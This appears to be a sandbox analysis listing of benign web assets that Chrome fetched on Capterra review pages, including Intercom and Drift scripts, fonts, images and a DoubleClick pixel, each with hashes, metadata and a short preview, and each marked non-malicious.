                                                                                                                                                                                                        File Type:gzip compressed data, from Unix, original size modulo 2^32 822052
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):180597
                                                                                                                                                                                                        Entropy (8bit):7.998427219843883
                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                        SSDEEP:3072:ykItTN5nZ+fFbhf7TcwQT1VTwWbD2YDT/4BfDYkL6BaTi8Uybgpf7tpoNuBeTa4f:GTNN0bhfUw0xlbD2YABDLL6QPsx7XoNV
                                                                                                                                                                                                        MD5:217DB78D093B259BA6CB3ACDC68C2FE6
                                                                                                                                                                                                        SHA1:F8F0570BF11A662A2ABAD3B14A15952B9B5D6728
                                                                                                                                                                                                        SHA-256:9E3BECA8AE6FD78C563AB2674D1661E8395A370CABF52D7D927BD59B5641D09B
                                                                                                                                                                                                        SHA-512:E5990B74FCF1826A98274A94C8EFB021EEACEEDF1AD6B5D2F10F60C2E6E579546F9624994026887558E90B467CA705A297C172AC228B985B60DD3CC48A3C542A
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://js.intercomcdn.com/frame.198be77c.js
                                                                                                                                                                                                        Preview:...........{w.G.7.....2.Gz..t].&...q.y.......j.mKA.#.26....w..I ...XjU.v............L.5..Mg.x1.N..Q.S.<I..Y<N...'I..._.....?<}.,.,.....s..r.G.v..2.Y.;.'..........9...6.}.r.9......_.VO..W6%N.....]1..Hi.W.d./...D(.F...d<\.D...v.6.i{aZLv...3K....5i'.U..o.....&.=.....$....f.Y...O.g..prj...........[....,...8..i..:z..O.._..........w-;Y.../^....z.[....._....g..=uf.|:ZR.........)..OwyrW....2..Vm:i..G.....(z.Y;9.^H..#[..3/&.... .#W...<{.=_QUA..E?.^xB..V.0.E^....A.B~q.....#[.W.I.....d.i;...e..*..T._$..gB..y.5cI.H?...SJ..k..k.O..T.....Vr.w.....F...W.G...p...E>.B+.m..._..1H!i...f..yU~(}.........4."H...g..nd.R...yU.U..QC.E>B...a.../.zD.G%...._M....R.i{.............M0$..8_.....}a.n\.H...t.<...OR.6.4=_l!hBl........<)..h.C.7.\..".b....... ...)....>.(.C...f..hW..-..|g..(W....Y....C..C)L.y......"...E.......U.Y...Q:.. /!....K{.(.."..9.L^..{%#m.(2.}.."M....z..Aw..bJ....e........k.P/...gS..d6...I....g1H&.v.p......1U.%.....b..x4j'..gd[t.q|.8I..w..,.S[
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (33094), with no line terminators
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):33094
                                                                                                                                                                                                        Entropy (8bit):5.271194779008479
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:+MT7wsVvhAfNL2hzOtDENEhe2xZc9KhvpcFvRrfVBejwX:+M/wsVvhAfNL2CEQbc9KVpcFvFVB6y
                                                                                                                                                                                                        MD5:D8739A9FE9A3A42936F5CD86C8727494
                                                                                                                                                                                                        SHA1:4FB60EC9F1C4EFF985C219BF24E4B1F340D62C97
                                                                                                                                                                                                        SHA-256:8F0F8792237470EE661C6AFC32CA68200DD74BCC0D544D0FD54C7777AF362EAE
                                                                                                                                                                                                        SHA-512:3326F37AE1DB03E06E8A1EC7E0B39D4F055C55E0B2DE6386F0677250A48B0146A081B3E17B42E01C194F0CD3FA5B63871FAE86478891644EA41BA1747A647EE5
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://js.driftt.com/core/assets/js/22.6b9a301a.chunk.js
                                                                                                                                                                                                        Preview:(window.webpackJsonp=window.webpackJsonp||[]).push([[22],{"+OSO":function(t,n,e){"use strict";e.d(n,"a",function(){return createClientReportEnvelope});var r=e("8dVd"),i=e("xqFT");function createClientReportEnvelope(t,n,e){var o=[{type:"client_report"},{timestamp:e||Object(i.a)(),discarded_events:t}];return Object(r.c)(n?{dsn:n}:{},[o])}},"/brt":function(t,n,e){"use strict";e.d(n,"a",function(){return severityLevelFromString});var r=["fatal","error","warning","log","info","debug"];function severityLevelFromString(t){return"warn"===t?"warning":r.includes(t)?t:"log"}},"26VM":function(t,n,e){"use strict";e.d(n,"a",function(){return isDOMError}),e.d(n,"b",function(){return isDOMException}),e.d(n,"c",function(){return isElement}),e.d(n,"d",function(){return isError}),e.d(n,"e",function(){return isErrorEvent}),e.d(n,"f",function(){return isEvent}),e.d(n,"g",function(){return isInstanceOf}),e.d(n,"h",function(){return isNaN}),e.d(n,"i",function(){return isPlainObject}),e.d(n,"j",function(){ret
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (7215), with no line terminators
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):7215
                                                                                                                                                                                                        Entropy (8bit):5.715038918631035
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:XFP79r8FRHF6U/Atg28bngH1nlm6AVPhJ98evibOEOxWShjulmu/TuVH5coKW8A0:p7VfnzeuN/Tk4
                                                                                                                                                                                                        MD5:1C6A1D59A85DC5CC5C7E07197599E9CE
                                                                                                                                                                                                        SHA1:C0E9404A317D60811E5190607D9F74073B9F9CC6
                                                                                                                                                                                                        SHA-256:DBEBA2B031E84A4C7100F7E8F2FE7284C9D296FA1BD2861889F86DF1D708B7B1
                                                                                                                                                                                                        SHA-512:84FBDD8171E910EFA566A3750DA726206EE3BA1AD4BD3F7BD8EF0A6AB52FA86A994D6EE94209F787E88EB6219C1FBE3B7E806E785E8D944525A06BB44D74CBA3
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://js.driftt.com/core/assets/js/main~493df0b3.8510c064.chunk.js
                                                                                                                                                                                                        Preview:(window.webpackJsonp=window.webpackJsonp||[]).push([[5],{"/7QA":function(t,i,E){"use strict";E.r(i),"production"!==E("LeJ0").a.ENV&&E("Cp41");var A=E("9EWH"),_=E("ADGC");Object(_.b)()&&Object(A.b)();!function polyfillKickoff(t){try{[1].includes(1)&&t()}catch(i){Promise.all([E.e(49).then(E.t.bind(null,"imET",7)),Promise.all([E.e(2),E.e(40)]).then(E.t.bind(null,"H+SE",7)),E.e(15).then(E.t.bind(null,"2GZm",7)),Promise.all([E.e(2),E.e(12),E.e(7)]).then(E.t.bind(null,"LSZE",7)),E.e(54).then(E.t.bind(null,"3yYM",7))]).then(function(){t()}).catch(function(t){return console.error("Error importing polyfills",t)})}}(function kickOff(){Promise.all([E.e(52),E.e(37),E.e(22),E.e(19),E.e(43),E.e(20),E.e(26),E.e(14),E.e(11),E.e(18),E.e(50),E.e(42),E.e(29),E.e(21),E.e(8),E.e(16),E.e(24),E.e(17)]).then(E.bind(null,"V+70")).catch(function(t){return console.warn("loading root widget failed",t)})})},0:function(t,i,E){t.exports=E("/7QA")},"91+0":function(t){t.exports={"//WS_CHAT_BASE":"localhost:4000",ENV:"
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):4963
                                                                                                                                                                                                        Entropy (8bit):3.970797149265085
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:JkDoaxJ7kt/QAGyHFVE/MYGsO4UpA1ndwrqeZJra31p3V8+49KPDRGo6bRA4ypAM:CVJ7iofyqfOppWwZraPlX4CqRANpQm
                                                                                                                                                                                                        MD5:2F52541F2143D87A00C9AA8D3B0E5685
                                                                                                                                                                                                        SHA1:213961D20B78063D0687560377085E82CAF4073B
                                                                                                                                                                                                        SHA-256:D35DE356A78CC0D848D67D07C3200614884C8466B496BF563A4CF3C85AA81CE2
                                                                                                                                                                                                        SHA-512:38489A5AF26325CFDEA11C9CC1DCF537EE224E309B539035F99888FE194EBE119C89FAE05DC3DBEC511C0704626F26FEDD53BE7481B4A7A0C85E26840DAFC3BA
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://publicate.it/images/trustpilot-1.svg
                                                                                                                                                                                                        Preview:<svg width="123" height="30" viewBox="0 0 123 30" xmlns="http://www.w3.org/2000/svg">. <g fill-rule="nonzero" fill="none">. <path d="M32.118 10.631h12.363v2.302h-4.868v12.973h-2.668V12.933h-4.847l.02-2.302zm11.833 4.216h2.281v2.139h.04c.082-.306.225-.59.429-.876.203-.285.448-.55.753-.774.285-.244.611-.428.978-.57a2.845 2.845 0 0 1 1.08-.224c.284 0 .488.02.59.02.102.02.224.04.326.04v2.343c-.163-.04-.347-.061-.53-.081-.183-.02-.346-.041-.53-.041-.407 0-.794.081-1.16.244-.367.163-.672.408-.957.713a3.862 3.862 0 0 0-.652 1.181c-.163.469-.245 1.019-.245 1.63v5.254H43.91l.041-10.998zm17.678 11.06h-2.403v-1.549h-.04c-.306.57-.754.998-1.345 1.345-.59.346-1.201.509-1.812.509-1.447 0-2.506-.346-3.157-1.08-.652-.712-.978-1.812-.978-3.258v-7.027h2.444v6.782c0 .978.183 1.67.57 2.057.367.408.896.611 1.569.611.509 0 .936-.081 1.283-.244.346-.163.631-.367.835-.631.224-.265.366-.591.468-.958.102-.366.143-.774.143-1.201v-6.416h2.444v11.06h-.02zm4.155-3.544c.082.712.346 1.201.815 1.507.468.285
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):8537
                                                                                                                                                                                                        Entropy (8bit):5.171382585673644
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:58/Y7GuL02UX/QSKgtNbKgtNGFft3QaxrDbAJ:L0X/KgXKgCtLxrXO
                                                                                                                                                                                                        MD5:AEA90520295F82A21C100B9B7F9C2606
                                                                                                                                                                                                        SHA1:199A3DA0159EBCBF20F9F2137E6FBDF47F7C974B
                                                                                                                                                                                                        SHA-256:CE5D6726C5C3D45D9E673AA4492AA7C429A12BBC98401256D8D2DF2013DFC779
                                                                                                                                                                                                        SHA-512:8E71B27E5F43F638103D15F44E30AB18AA7A76F7C2B7EA63FCEF4E8DA40517218193053D2CA2CC301AAD6B30FA965029C3815FEFA19702785E473051A2DD5545
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:{"AjaxWatches":[{"URLRegex":"https:\\/\\/reviews.capstage.net\\/\\/?.*","RecordReq":2,"RecordRsp":1,"ReqWhitelist":"globalProductId\nlang\nreviewerEmailAddress","RspWhitelist":"","ReqAllowlist":"globalProductId\nlang\nreviewerEmailAddress","RspAllowlist":"","ReqBody":false,"RspBody":false},{"URLRegex":"https:\\/\\/reviews.capterra.com\\/\\/?.*","RecordReq":2,"RecordRsp":1,"ReqWhitelist":"reviewerEmailAddress\nlang\nglobalProductId","RspWhitelist":"","ReqAllowlist":"reviewerEmailAddress\nlang\nglobalProductId","RspAllowlist":"","ReqBody":false,"RspBody":false}],"BehaviorSignalSettings":{"ElementBlocks":[{"Selector":"#__next\u003ediv\u003ediv.nb-bg-white.nb-px-lg.nb-width-limiter.sm\\:nb-bg-transparent.sm\\:nb-flex.sm\\:nb-flex-col.sm\\:nb-justify-center.sm\\:nb-mb-4xl.sm\\:nb-relative\u003ediv\u003ediv.nb-flex.nb-flex-col.nb-items-center\u003ebutton","Signals":[2,1]}]},"Domains":{"OnlyKnownDomains":false},"ElementBlocks":[{"Selector":"input[type=password]","Consent":false,"Type":1,"Grou
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:HTML document, ASCII text, with very long lines (10200), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):10200
                                                                                                                                                                                                        Entropy (8bit):5.298822363926731
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:Vd89RblMYLp0eNNlO1SKCQe+IRSSLMXAgo8BhU91Ec:VdgblMmp0eNNlO10QcfLORBhUnEc
                                                                                                                                                                                                        MD5:DB6163BA6AEBB0C67404776DD315FCF6
                                                                                                                                                                                                        SHA1:B7F1584A42447F90671ED292248F6F15A96DC0F5
                                                                                                                                                                                                        SHA-256:BD8512819CFDB87DA855F5BBE87732053525D83CBC1F978143B8311640AF3586
                                                                                                                                                                                                        SHA-512:E8C6B275AD895EF6F5B1AEC5DE294E37A380E645B34FC0FB0F88DDE2B35B6C95D5A002752FE7A735F63039D95DC4EFC0F00C23789BE6136C0A61705C848398C6
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:const originCheck=new RegExp(/.*?[\.\-](softwareadvice|gartner-digital-markets|g-dm)(\.vercel\.app|\.com)|https:\/\/lead-acquisition-service\.vercel\.app/);let originalOverflowStyle;const hasFaasExitIntentBeenShown=()=>{try{return!!Object.keys(localStorage).find(e=>e.match(/FAAS_MODAL_.*LAST_DISPLAY_TIME/))}catch(e){console.log(e.message)}},convertedOnDrift=()=>!!(window?.dataLayer&&0<window?.dataLayer?.length)&&!!window.dataLayer.find(e=>"drift_phone_capture"===e.eventName||"drift_chat_started"===e.eventName),handleMessage=e=>{"string"==typeof e?.data&&((e=JSON.parse(e?.data))?.event?.includes("close modal")&&(window.faasBlockExitIntent=!1,document?.querySelector("#las-modal")?.remove(),document.body.style.overflow=originalOverflowStyle,window.removeEventListener("message",handleMessage),window.sessionStorage.getItem("lasConversion")||window.localStorage?.getItem("exitIntentShown")||!e?.event?.includes("softwareadvice")&&!e?.event?.includes("getapp")||convertedOnDrift()||(window.launc
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (3172), with no line terminators
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):3172
                                                                                                                                                                                                        Entropy (8bit):4.853184971105934
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:0fNOEByffNzfoByVKtB3fNSKtBNJAhThSRc05s:0f0EwfflfowCBfdbSXl05s
                                                                                                                                                                                                        MD5:3B86DD5DF78EC4E994904E6BDADFEF6A
                                                                                                                                                                                                        SHA1:AFC34A3210A6A034CDFEE3F975206773F5B644CC
                                                                                                                                                                                                        SHA-256:A059B35680FFAD5B6CB4DA08329BBA36D82DB37CBD370160A7CC86DDE40663B4
                                                                                                                                                                                                        SHA-512:339A11B61E89E4F715E4445A23F375C738143396B2EB117D100ECD3CEDDAEC92F40125B1A99C621AF2BFA97061EE6C5D540205FAA72ACCA0674431C6AFF31055
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://indd.adobe.com/1_c19ab23/public/build/contentHandler/contentHandler.min.css
                                                                                                                                                                                                        Preview:.flyInFromRightAnimation{-webkit-animation-delay:0s;-webkit-animation-duration:1s;-webkit-animation-fill-mode:forwards;-webkit-animation-iteration-count:1;-webkit-animation-name:flyInFromRightKeyFrames;-webkit-animation-timing-function:ease;-webkit-transform-origin:0 0;animation-delay:0s;animation-duration:1s;animation-fill-mode:forwards;animation-iteration-count:1;animation-name:flyInFromRightKeyFrames;animation-timing-function:ease;transform-origin:0 0}.flyInFromLeftAnimation,.flyOutRightAnimation{-webkit-animation-delay:0s;-webkit-animation-duration:1s;-webkit-animation-fill-mode:forwards;-webkit-animation-iteration-count:1;-webkit-animation-timing-function:ease}.flyInFromLeftAnimation{-webkit-animation-name:flyInFromLeftKeyFrames;-webkit-transform-origin:0 0;animation-delay:0s;animation-duration:1s;animation-fill-mode:forwards;animation-iteration-count:1;animation-name:flyInFromLeftKeyFrames;animation-timing-function:ease;transform-origin:0 0}@-webkit-keyframes flyOutRightKeyFrames
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ISO Media, AVIF Image
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):5122
                                                                                                                                                                                                        Entropy (8bit):7.280606474604708
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:+7jE5N26MT0D5MdtbZPAVwzVJ8jI3JMhcSND5ULP4:+7AoYNMtKwXEI5Mh9xy4
                                                                                                                                                                                                        MD5:EEDBFBF610BDE4ACECA21972540DF51B
                                                                                                                                                                                                        SHA1:87AF2C323E6D30AF796D23F2C3476200E9D0767A
                                                                                                                                                                                                        SHA-256:F8E4D141942BFFB6393DDB41969291C8992BE65F549BB90B8B889F74915A802A
                                                                                                                                                                                                        SHA-512:63F9CAD308ED4F429A07A046E783A2F0A192BC6B0522BC59BB018582A0B566CD7DE68C863918FFD1A1F6C205C64C3DE6D5D8BAE2608F6145ADC5592A550810EA
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://gdm-catalog-fmapi-prod.imgix.net/ProductLogo/27a50d30-49b3-4fb0-902d-34d05a775b15.png?w=60&h=60&dpr=2&auto=format
                                                                                                                                                                                                        Preview:... ftypavif....avifmif1miafMA1B....meta.......(hdlr........pict............libavif.....pitm.........,iloc....D............(.....................Biinf..........infe........av01Color.....infe........av01Alpha.....iref........auxl..........iprp....ipco....ispe.......x...x....pixi............av1C.......Tcolrprof...HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch............................
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 17072, version 1.0
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):17072
                                                                                                                                                                                                        Entropy (8bit):7.989353907758723
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:f3GwyH0sglp8a+PvDNJaxsHKg6gWGOiaEpnXL6tJBXGTGRO:vGWrgPvDNDHKTgWGOiaUXkVmaO
                                                                                                                                                                                                        MD5:A049F4C6BCB907E3D451BDB388C8E86F
                                                                                                                                                                                                        SHA1:F6261C1401A8A0F31AE74FB9EF7AB6DFEC3EF1B6
                                                                                                                                                                                                        SHA-256:B19EFE906C9B0345DB45525ED83C76031644E39329A36D39BADF5275BCE363C2
                                                                                                                                                                                                        SHA-512:7D26EE3315BF2964C55803D317C6021224CA1C298BB68AB96D6D4BD1870DEFBADC1A722C726C81556B376737B52E38C9BAED6D5A1FF1B2C5A25E3B634D2CBB24
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://fonts.gstatic.com/s/lato/v24/S6u-w4BMUTPHjxsIPx-oPCI.woff2
                                                                                                                                                                                                        Preview:wOF2......B...........BP..........................v.p.`..`..D....s.....$.....B..6.$..v. ..0..E.r.....w...........n.J"..#......-1..?%i...b.J..C...Eg"...`X.....`(...tL....2.9.!.:C.........|eP..,.p.s..w.=..JL.c.[4..k.V\U6.V.v......v.-m..>..):....4.A.}.-..m#.r...j....3{.....~E.............=.%...........}A8....R.D.A0...(..R...NQ.q...gM....n...w..]nW....kW1l.<D.68.....=.....4..0....T.2....8..*....L........b......:.z.. .. ...l..O9..E..f.Y...F..q.A`.g.g.......O....=..3..b9$.....^...L...R..T.Tx..bU2....3.8........M...5.......f.>.......F.=.^.DF.N]..W...%=.......s'/..-..-..".U.f....$M...%N.P....l.w..q.W..Y.....Q)?..........&...>x..B}EW.r..+..2KX-..!...........;.6?..(x*U.o.6....?...%!..~......Q.c.B.\.nA...SjZ..N].".}{.u..N...K.3.Y....H._+.a'..& ....cy...~...b.0..!...d].2...M:.p.....(..xw...p...:...t..zf.6.:5.....W.....=.t./E..p.=...`P.....{n...Y..VG.`h}..;.....2.}..a....x.'.............V._...#^.pb.;....{.'..Q....mz..<..8.3.W.-.,1.5,jpf......i<?.....
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (799)
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):5327
                                                                                                                                                                                                        Entropy (8bit):5.056940667467091
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:+zpHg/ci55bnkO3cng+MS+9yfnWeQUjqsTiAb0MgVnEHOJgluUc7yhUe9PqGpdxd:+zNg/Pv5QJnWJVLAb0MgVnEHOJAuUvi4
                                                                                                                                                                                                        MD5:1A7FECB4F9B7496D563F6193750A49E3
                                                                                                                                                                                                        SHA1:3B87C682C61E03F689B3023906095FD89E674FC8
                                                                                                                                                                                                        SHA-256:0F8A0F420442C0034553DC843F0013C687CA5FD6BB8B53CC4EC9E80B0C0B2297
                                                                                                                                                                                                        SHA-512:AAFCBF63C48923144D4B6F0AEF21645F7E34A4286F3E0FD623C1C37F38E5A3BC7A1194F005717BF069DD8C2A5098B83A24A6D79A89EDA392160B5A64BF2DC616
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:(function () {. function fixScriptTagsNotExecuting(node) {. if (node.tagName === "SCRIPT") {. node.parentNode.replaceChild(cloneScriptNode(node), node);. } else {. var i = -1,. children = node.childNodes;. while (++i < children.length) {. fixScriptTagsNotExecuting(children[i]);. }. }. return node;.}..function cloneScriptNode(node) {. var script = document.createElement("script");. script.text = node.innerHTML;.. var i = -1,. attrs = node.attributes,. attr;. while (++i < attrs.length) {. script.setAttribute((attr = attrs[i]).name, attr.value);. }. return script;.}.. var state={"modalDisplayFrequency":"Once per user, ever","formId":"6HyOcTRcBkZLAc2QGex3tl","baseUrl":"https://forms-as-a-service.capterra.com","isTest":false,"BETA_BASE_URL":"https://forms-as-a-service.capstage.net","BETA_RATE":0,"modalRestrictedUrls":["/sem/","/sem-compare/","/sem-compare-services/","/sem-ppl/","raas.capterra.com","review.capterra.com","reviews.capterra.com","insig
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:HTML document, ASCII text, with very long lines (695), with no line terminators
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):695
                                                                                                                                                                                                        Entropy (8bit):5.6134081619349665
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:12:hnMQbwuOaxyCkv4AEHeW3yvDyrnxXdhTiUMGT2IWaEuZO/Ik+BWEA:hMiRO9q302FNp8G9PTbK
                                                                                                                                                                                                        MD5:FB7952B8B9AAF9C959EE1119ED680F3F
                                                                                                                                                                                                        SHA1:13B7C7C1D6BBF54CDC3B6A0CCE9CB5B782ED0FB9
                                                                                                                                                                                                        SHA-256:C1732EF2F09D28CF48BEEEB2470544858655D04BF50683CAF86D3A8D0B663DD6
                                                                                                                                                                                                        SHA-512:6C0FFB0D00852209B44E5461733381354AA91FFAC6187167F2AC2899BCC36AC6F92ABC3D0B9466F72AAE52395754D7F42F95E7A94824D6F4E713367D5CA7A521
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://8036043.fls.doubleclick.net/activityi;dc_pre=CI324N-OnYgDFWyEJwId1n8yjA;src=8036043;type=visit;cat=capte0;ord=1421174349590;npa=0;auiddc=1810143887.1725034608;ps=1;pcor=1226563587;uaa=x86;uab=64;uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132;uamb=0;uam=;uap=Windows;uapv=10.0.0;uaw=0;pscdl=noapi;frm=0;gtm=45fe48s0v9181622439z876106154za201zb76106154;gcs=G111;gcd=13t3t3t3t5l1;dma=0;tag_exp=0;epver=2;~oref=https%3A%2F%2Freviews.capterra.com%2Fsearch%2F?
                                                                                                                                                                                                        Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"><img src="https://adservice.google.com/ddm/fls/z/dc_pre=CI324N-OnYgDFWyEJwId1n8yjA;src=8036043;type=visit;cat=capte0;ord=1421174349590;npa=0;auiddc=*;ps=1;pcor=1226563587;uaa=x86;uab=64;uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132;uamb=0;uam=;uap=Windows;uapv=10.0.0;uaw=0;pscdl=noapi;frm=0;gtm=45fe48s0v9181622439z876106154za201zb76106154;gcs=G111;gcd=13t3t3t3t5l1;dma=0;tag_exp=0;epver=2;~oref=https%3A%2F%2Freviews.capterra.com%2Fsearch%2F"/></body></html>
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:PNG image data, 32 x 32, 8-bit colormap, non-interlaced
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):1708
                                                                                                                                                                                                        Entropy (8bit):7.362290097738038
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:hIxuHv+aIkChdxrAPF2M0qbtoWf+1OWKCac:ZH8hjA9FRb+uWOHQ
                                                                                                                                                                                                        MD5:DE3D8504CBD63F3726E9F87C778CBB76
                                                                                                                                                                                                        SHA1:30981C97865F170ADF4F11EA524FE17230B35DEC
                                                                                                                                                                                                        SHA-256:618F55C2A342ED44F3B109AAC2348885DC8E78170631DBB9D29F9968FDA91835
                                                                                                                                                                                                        SHA-512:D478B89C294B5AD354846B61D99D015672E414546D75C62A61E13CA3219E9009DBB317502E38CAF939F29EF4BF15C94D9DC8F0ADEFA96572D567A6ECA1F03D87
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:.PNG........IHDR... ... .....D.......sRGB.........PLTEGpL-.~5.../..Z.-..[..6....}/.}4....X-.~..[6.......|..Z...6....~..[6.......7....[./.-5../.}..[..Z/.~.-..~..}-.}..Z..2......../..`..*7........._/._6..-.a.............#4....\..........}..Z...6../.}8...-..Z6.........[...-.}-.}5...../.~-.|..Y6....Z6....Z7.../..8........~7...-.-.-..Z.-..-.~.,,.}..[..\./0....Z..[...6../.~..[...7....Y.36..... ....*.U. `..}..\..6....}5..6..).Z..~..../@..-.`.....`..[6..3....X.... ..[..Z...6.....8....~........5.../......9....7..........Z0.u..|..Y..Z.-.*7....~.... ....Y*....}."..Z/.|*....}....[*..3.w/.~5..0.}..}.....[..[..Z."U.*U..U.....[..Z..[.3..6..6..6...0@..."..X3.....-6..-...0..5....}....Z6../....\./7..6..7....~/....\././..Z..7../....[7....[7....\.../8../......[6...//.../..[.1.#....tRNS.ee1.ee...111III..........22.IU...........+c.....+++.,.+.%++,.+.....b``f...b.3fe2............2..3I.UU.UVV...``.......V.c(............(..(.(.....(..... .. (., (,%,(.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):43157
                                                                                                                                                                                                        Entropy (8bit):6.040809323233645
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:768:GVg2pSErZTlFDqBYHI9vuNlPFgRngSxC7aZbXvTl/x90aDJEj46Nwo05npEZrr:ZErNOBNKPFgxFXZ7Tl/zFEj4KHwpE5
                                                                                                                                                                                                        MD5:1ED2EA6546D512C55C2B894A9B9EBA2D
                                                                                                                                                                                                        SHA1:6FC9A835B7429448C4CED7DA9958B66AFBD3E97A
                                                                                                                                                                                                        SHA-256:81BBBD92C7A245624A5CE9CFE9138344152480CD4AE9A695C0787B6F912B03AB
                                                                                                                                                                                                        SHA-512:AFA6564ED219F588399BD9BC2874CA93905E79D9CD2E0AE2B0EE69DE76EED6B11942C665DB049BC70F0AD3D79C16B1F186AC81F1DA9965458A728725BC1B4325
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
